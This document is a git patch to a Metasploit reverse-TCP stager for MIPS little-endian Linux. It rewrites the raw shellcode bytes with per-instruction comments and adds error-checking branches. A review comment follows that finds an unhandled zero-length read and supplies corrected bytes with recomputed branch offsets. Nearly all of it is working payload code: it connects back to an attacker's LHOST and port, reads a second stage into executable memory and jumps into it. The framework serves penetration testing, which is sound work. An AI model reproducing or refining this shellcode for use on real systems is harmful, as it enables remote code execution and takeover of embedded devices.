From ed0b5a843d16dbd0c45e33fd6884289814b8fef8 Mon Sep 17 00:00:00 2001
From: tkmru
Date: Thu, 6 Jul 2017 17:34:22 +0900
Subject: [PATCH] add error handling bin to reverse_tcp on mipsbe
---
 .../stagers/linux/mipsle/reverse_tcp.rb | 91 +++++++++++++++----
 1 file changed, 72 insertions(+), 19 deletions(-)
diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
index 4c18dbcbdd..8689548080 100644
--- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
@@ -20,7 +20,8 @@ module MetasploitModule
 'Description' => 'Connect back to the attacker',
 'Author' => [
- 'juan vazquez'
+ 'juan vazquez',
+ 'tkmru'
 ],
 'License' => MSF_LICENSE,
 'Platform' => 'linux',
@@ -30,26 +31,78 @@ module MetasploitModule
 {
 'Offsets' =>
 {
- 'LHOST' => [ [60, 56], 'ADDR16MSB' ],
- 'LPORT' => [ 48, 'n' ],
+ 'LHOST' => [ [68, 64], 'ADDR16MSB' ],
+ 'LPORT' => [ 56, 'n' ],
 },
 'Payload' =>
- "\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
- "\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
- "\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
- "\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
- "\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
- "\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
- "\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
- "\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
- "\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
- "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
- "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
- "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
- "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
- "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
- "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
- "\x20\x02"
+ "\xfa\xff\x0f\x24" + # li t7,-6
+ "\x27\x78\xe0\x01" + # nor t7,t7,zero
+ "\xfd\xff\xe4\x21" + # addi a0,t7,-3
+ "\xfd\xff\xe5\x21" + # addi a1,t7,-3
+ "\xff\xff\x06\x28" + # slti a2,zero,-1
+ "\x57\x10\x02\x24" + # li v0,4183
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x2a\x80\x07\x00" + # slt s0,zero,a3
+ "\x36\x00\x00\x16" + # bnez s0,0x4006bc
+ "\xfc\xff\xa2\xaf" + # sw v0,-4(sp)
+ "\xfc\xff\xa4\x8f" + # lw a0,-4(sp)
+ "\xfd\xff\x0f\x24" + # li t7,-3
+ "\x27\x78\xe0\x01" + # nor t7,t7,zero
+ "\xe2\xff\xaf\xaf" + # sw t7,-30(sp)
+ "\x11\x5c\x0e\x34" + # li t6,0x5c11
+ "\xe4\xff\xae\xaf" + # sw t6,-28(sp)
+ "\x00\x01\x0e\x3c" + # lui t6,0x100
+ "\x7f\x00\xce\x35" + # ori t6,t6,0x7f
+ "\xe6\xff\xae\xaf" + # sw t6,-26(sp)
+ "\xe2\xff\xa5\x27" + # addiu a1,sp,-30
+ "\xef\xff\x0c\x24" + # li t4,-17
+ "\x27\x30\x80\x01" + # nor a2,t4,zero
+ "\x4a\x10\x02\x24" + # li v0,4170
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x2a\x80\x07\x00" + # slt s0,zero,a3
+ "\x25\x00\x00\x16" + # bnez s0,0x4006bc
+ "\xff\xff\x04\x24" + # li a0,-1
+ "\x01\x10\x05\x24" + # li a1,4097
+ "\xff\xff\xa5\x20" + # addi a1,a1,-1
+ "\xf8\xff\x09\x24" + # li t1,-8
+ "\x27\x48\x20\x01" + # nor t1,t1,zero
+ "\x20\x30\x20\x01" + # add a2,t1,zero
+ "\x02\x08\x07\x24" + # li a3,2050
+ "\xea\xff\x0b\x24" + # li t3,-22
+ "\x27\x58\x60\x01" + # nor t3,t3,zero
+ "\x20\x58\xab\x03" + # add t3,sp,t3
+ "\xff\xff\x60\xad" + # sw zero,-1(t3)
+ "\xfb\xff\x62\xad" + # sw v0,-5(t3)
+ "\xfa\x0f\x02\x24" + # li v0,4090
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x2a\x80\x07\x00" + # slt s0,zero,a3
+ "\x15\x00\x00\x16" + # bnez s0,0x4006bc
+ "\xf8\xff\xa2\xaf" + # sw v0,-8(sp)
+ "\xfc\xff\xa4\x8f" + # lw a0,-4(sp)
+ "\xf8\xff\xa5\x8f" + # lw a1,-8(sp)
+ "\x01\x10\x06\x24" + # li a2,4097
+ "\xff\xff\xc6\x20" + # addi a2,a2,-1
+ "\xa3\x0f\x02\x24" + # li v0,4003
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x2a\x80\x07\x00" + # slt s0,zero,a3
+ "\x0c\x00\x00\x16" + # bnez s0,0x4006bc
+ "\xf8\xff\xa4\x8f" + # lw a0,-8(sp)
+ "\x20\x28\x40\x00" + # add a1,v0,zero
+ "\xfd\xff\x09\x24" + # li t1,-3
+ "\x27\x48\x20\x01" + # nor t1,t1,zero
+ "\x20\x30\x20\x01" + # add a2,t1,zero
+ "\x33\x10\x02\x24" + # li v0,4147
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x2a\x80\x07\x00" + # slt s0,zero,a3
+ "\x03\x00\x00\x16" + # bnez s0,0x4006bc
+ "\xf8\xff\xb1\x8f" + # lw s1,-8(sp)
+ "\xfc\xff\xb2\x8f" + # lw s2,-4(sp)
+ "\x09\xf8\x20\x02" + # jalr s1
+ "\x01\x00\x04\x24" + # li a0,1
+ "\xa1\x0f\x02\x24" + # li v0,4001
+ "\x0c\x01\x01\x01" + # syscall 0x40404
+ "\x25\x08\x20\x00" + # move at,at
+ "\x25\x08\x20\x00" # move at,at
 }
 ))
 end
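Review bot: The new `slt s0,zero,a3` / `bnez s0` checks do not cover read() returning 0: if the peer closes the connection before sending a stage, the syscall succeeds (a3 = 0) with v0 = 0, so the check after `li v0,4003`/`syscall` falls through, cacheflush is called with a zero length, and `jalr s1` jumps into the still-untouched anonymous mmap page — all-zero words decode as `nop` on MIPS, so as far as I can tell it runs off the end of the page and faults instead of taking the exit stub. A `beqz v0,exit` placed right after `lw a0,-8(sp)` (which sits in the delay slot of that bnez, so it must stay where it is) closes the gap; it pushes the exit stub one instruction further, so the four earlier `bnez s0` immediates each grow by one while the cacheflush branch (offset 3) and the LHOST/LPORT byte offsets, which all precede the insertion, are unaffected. The `0x4006bc` in every bnez comment is an absolute address from whatever test binary was disassembled and means nothing inside the payload; `# bnez s0,exit` would document the intent instead. Separately, the subject says mipsbe while this hunk patches the mipsle stager, and the enclosing `initialize` starts above the hunk.
```ruby
            "\x37\x00\x00\x16" +  # bnez s0,exit   (socket failed; was 0x36)
            # … unchanged: sw v0,-4(sp) … sockaddr setup, connect …
            "\x26\x00\x00\x16" +  # bnez s0,exit   (connect failed; was 0x25)
            # … unchanged: li a0,-1 … mmap …
            "\x16\x00\x00\x16" +  # bnez s0,exit   (mmap failed; was 0x15)
            # … unchanged: sw v0,-8(sp) … read …
            "\x0d\x00\x00\x16" +  # bnez s0,exit   (read failed; was 0x0c)
            "\xf8\xff\xa4\x8f" +  # lw a0,-8(sp)   (delay slot, unchanged)
            "\x0b\x00\x40\x10" +  # beqz v0,exit   (read returned 0: no stage)
            "\x20\x28\x40\x00" +  # add a1,v0,zero (delay slot, unchanged)
            # … unchanged: cacheflush and its bnez s0 (offset 3), jalr s1, exit stub …
```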